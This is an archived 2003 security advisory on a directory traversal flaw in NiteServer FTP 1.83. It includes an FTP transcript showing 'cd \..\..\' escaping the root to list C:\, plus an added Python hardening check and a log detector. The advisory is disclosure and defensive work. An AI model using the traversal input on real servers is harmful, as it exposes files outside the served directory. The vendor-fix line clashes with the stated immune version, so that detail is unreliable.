[VulnWatch] Directory traversal vulnerabilities found in NITE ftp-server version 1.83

From: matrix@infowarfare.dk
Date: 01/15/03

    Date: Wed, 15 Jan 2003 13:10:46 +0100
    From: matrix@infowarfare.dk
    To: undisclosed-recipients:;
    

                     Directory traversal vulnerabilities found in
                            NITE ftp-server version 1.83
                                                             
                               Discovered by Dennis Rand
                                www.Infowarfare.dk
    ------------------------------------------------------------------------

    SUMMARY

    The NiteServer is a simple FTP-Server program with some special features.
    It is free and easy to use.
    The following commands are recognized:
      USER PORT RETR REST
      PASS STOR CWD DELE
      HELP LIST
    so it should work with any usual ftp-client.
    Special Download-Ratio features are implemented.
    User logins are logged with their IP number, so the up/download ratio
    is kept for the future. Spy on users: watch what they are uploading or downloading.
    Are you interested in learning Visual Basic Internet programming ?
    Do you need some different features ?
    You can purchase the source-code (VB 6.0) from the Author.
    Simply send a check about 25 US-$ to

    A directory traversal vulnerability in the product allows remote attackers to
    cause the server to traverse into directories that reside outside the bounding
    FTP root directory.

    DETAILS

    Vulnerable systems:
     * Niteserver Version:1.83 - Author:Thomas Krebs
       on Windows NT 4.0 and Windows 2000 Server, fully patched

    Immune systems:
     * NiteServer version 1.85

    NiteServer's failure to filter out "\.." sequences in command requests allows
    remote users to break out of the restricted directory and gain read access
    to the system directory structure, making it possible to discover the directory
    structure outside the configured areas.

    The following transcript demonstrates a sample exploitation of the
    vulnerabilities:

    Connected to 192.168.1.22.
    220- Niteserver Version:1.83
    220- Author:Thomas Krebs
    220- email: turtie@knuut.de
    220- Welcome to the Niteserver
    220- First Author:Thomas Krebs!
    220-
    220
    User (192.168.1.22:(none)): anonymous
    331 User anonymous accepted, send password.....
    Password:
    230 User anonymous accepted, ok come on.....
    ftp> ls
    200 PORT command ok....
    257 "c:/ftpd/data" is working directory...c:\ftpd\data
    ftp> cd /
    250 Directory changed to"c:\ftpd\data" .
    ftp> cd ..
    250 Directory changed to"c:\ftpd\data" .
    ftp> cd \..\..\
    250 Directory changed to"c:\" .
    ftp> ls
    200 PORT command ok....
    257 "c:/" is working directory...c:\
    200 PORT command successful
    150 Opening ASCII mode data connection for /bin/ls.
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
    drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
    drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
    drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler
    til Windows Update
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
    -rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
    drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
    -rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
    -rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
    drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
    -rwxr-xr-x 1 User Group 134217728 Dec 30 15:24 pagefile.sys
    drwxr-xr-x 1 User Group 0 Dec 30 15:19 Program Files
    drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
    drwxr-xr-x 1 User Group 0 Dec 24 00:08 TEMP
    drwxr-xr-x 1 User Group 0 Dec 30 16:30 WINNT
    226 Listing complete.
    ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
    ftp> bye
    221 Goodbye.

    Detection:
    Niteserver Version:1.83 is vulnerable to the above-described attacks.
    Earlier versions may be susceptible as well. To determine if a specific
    implementation is vulnerable, experiment by following the above
    transcript.
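    The two passages above (the failure to filter "\.." sequences, and the
    detection guidance) are illustrated by the following added example. It is not
    NiteServer code and not the author's; it is a constructed Python model of
    the defect class beside the hardened check a server should perform, plus a
    small detector run over constructed FTP command log lines. The FTP root
    `c:\ftpd\data` is taken from the transcript; the log format, the IP address
    and the function names (`naive_filter_passes`, `safe_resolve`,
    `find_traversal_attempts`) are assumptions made for the example.

```python
"""Added example (not NiteServer code): Windows FTP path containment and
traversal detection. All sample data here is constructed."""
import ntpath
import re

# Constructed FTP root, matching the working directory shown in the transcript.
FTP_ROOT = "c:\\ftpd\\data"


def naive_filter_passes(arg: str) -> bool:
    """Constructed model of the defect class (assumption, not the real code):
    a filter that only inspects forward-slash-separated components, so a
    backslash-separated '\\..\\..\\' is never seen as a parent reference."""
    return ".." not in arg.split("/")


def safe_resolve(root: str, cwd: str, arg: str):
    """Hardened CWD/RETR target resolution.

    Windows treats '/' and '\\' alike, so both are folded to '\\' before the
    path is normalised. The candidate is then resolved against the FTP root
    (for absolute arguments) or the current directory (for relative ones)
    and accepted only if it still lies inside the root. Returns the resolved
    path, or None if the request would escape the root."""
    arg = arg.replace("/", "\\")
    root_n = ntpath.normcase(ntpath.normpath(root))
    if arg.startswith("\\"):
        # Absolute within the FTP namespace: '\' means the FTP root, not c:\.
        candidate = ntpath.join(root, arg.lstrip("\\"))
    else:
        candidate = ntpath.join(cwd, arg)
    # normpath collapses '..' components; normcase makes the compare case-free.
    candidate_n = ntpath.normcase(ntpath.normpath(candidate))
    prefix = root_n.rstrip("\\") + "\\"
    if candidate_n == root_n or candidate_n.startswith(prefix):
        return candidate_n
    return None  # traversal outside the root (also rejects other drives)


# Detection over a constructed command log: "<date> <time> <ip> <CMD> [arg]".
LOG_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<ip>\S+) (?P<cmd>[A-Z]{3,4})(?: (?P<arg>.*))?$")
# A '..' component bounded by either separator or the string ends.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.(?=[\\/]|$)")
PATH_COMMANDS = {"CWD", "RETR", "STOR", "DELE", "LIST"}

LOG_LINES = [  # constructed sample lines
    "2003-01-13 12:00:01 192.0.2.10 USER anonymous",
    "2003-01-13 12:00:02 192.0.2.10 CWD /",
    "2003-01-13 12:00:03 192.0.2.10 CWD ..",
    "2003-01-13 12:00:04 192.0.2.10 CWD \\..\\..\\",
    "2003-01-13 12:00:05 192.0.2.10 CWD my..dir",
    "2003-01-13 12:00:06 192.0.2.10 LIST",
]


def find_traversal_attempts(lines):
    """Return (ip, command, argument) for every path-taking command whose
    argument contains a '..' component with either separator style."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        cmd, arg = m.group("cmd"), m.group("arg") or ""
        if cmd in PATH_COMMANDS and TRAVERSAL_RE.search(arg):
            hits.append((m.group("ip"), cmd, arg))
    return hits


if __name__ == "__main__":
    for a in ["/", "..", "\\..\\..\\", "pub"]:
        print(f"{a!r:14} naive passes={naive_filter_passes(a)!s:5} "
              f"safe -> {safe_resolve(FTP_ROOT, FTP_ROOT, a)}")
    for hit in find_traversal_attempts(LOG_LINES):
        print("traversal attempt:", hit)
```

    The containment check deliberately compares normalised paths rather than
    searching the argument for ".." strings: a name such as `my..dir` is legal,
    while `\..\..\` only reveals itself once the separators are unified and the
    path is collapsed. The detector, by contrast, is a coarse log filter meant to
    surface the attempts in the transcript above for review.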

    Vendor response:
    Niteserver Version:1.83 fixes this issue. The latest version is
    available from come.to/niteserversite

    Disclosure timeline:
    12/12/2002 Found the Vulnerability.
    12/12/2002 Author notified (turtie@knuut.de)
    01/13/2003 No Responses received from turtie@knuut.de
    01/13/2003 Public Disclosure.

    ADDITIONAL INFORMATION
    The vulnerability was discovered by Dennis Rand <matrix@infowarfare.dk>

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any
    kind.
    In no event shall we be liable for any damages whatsoever including direct,
    indirect, incidental, consequential, loss of business profits or special
    damages.



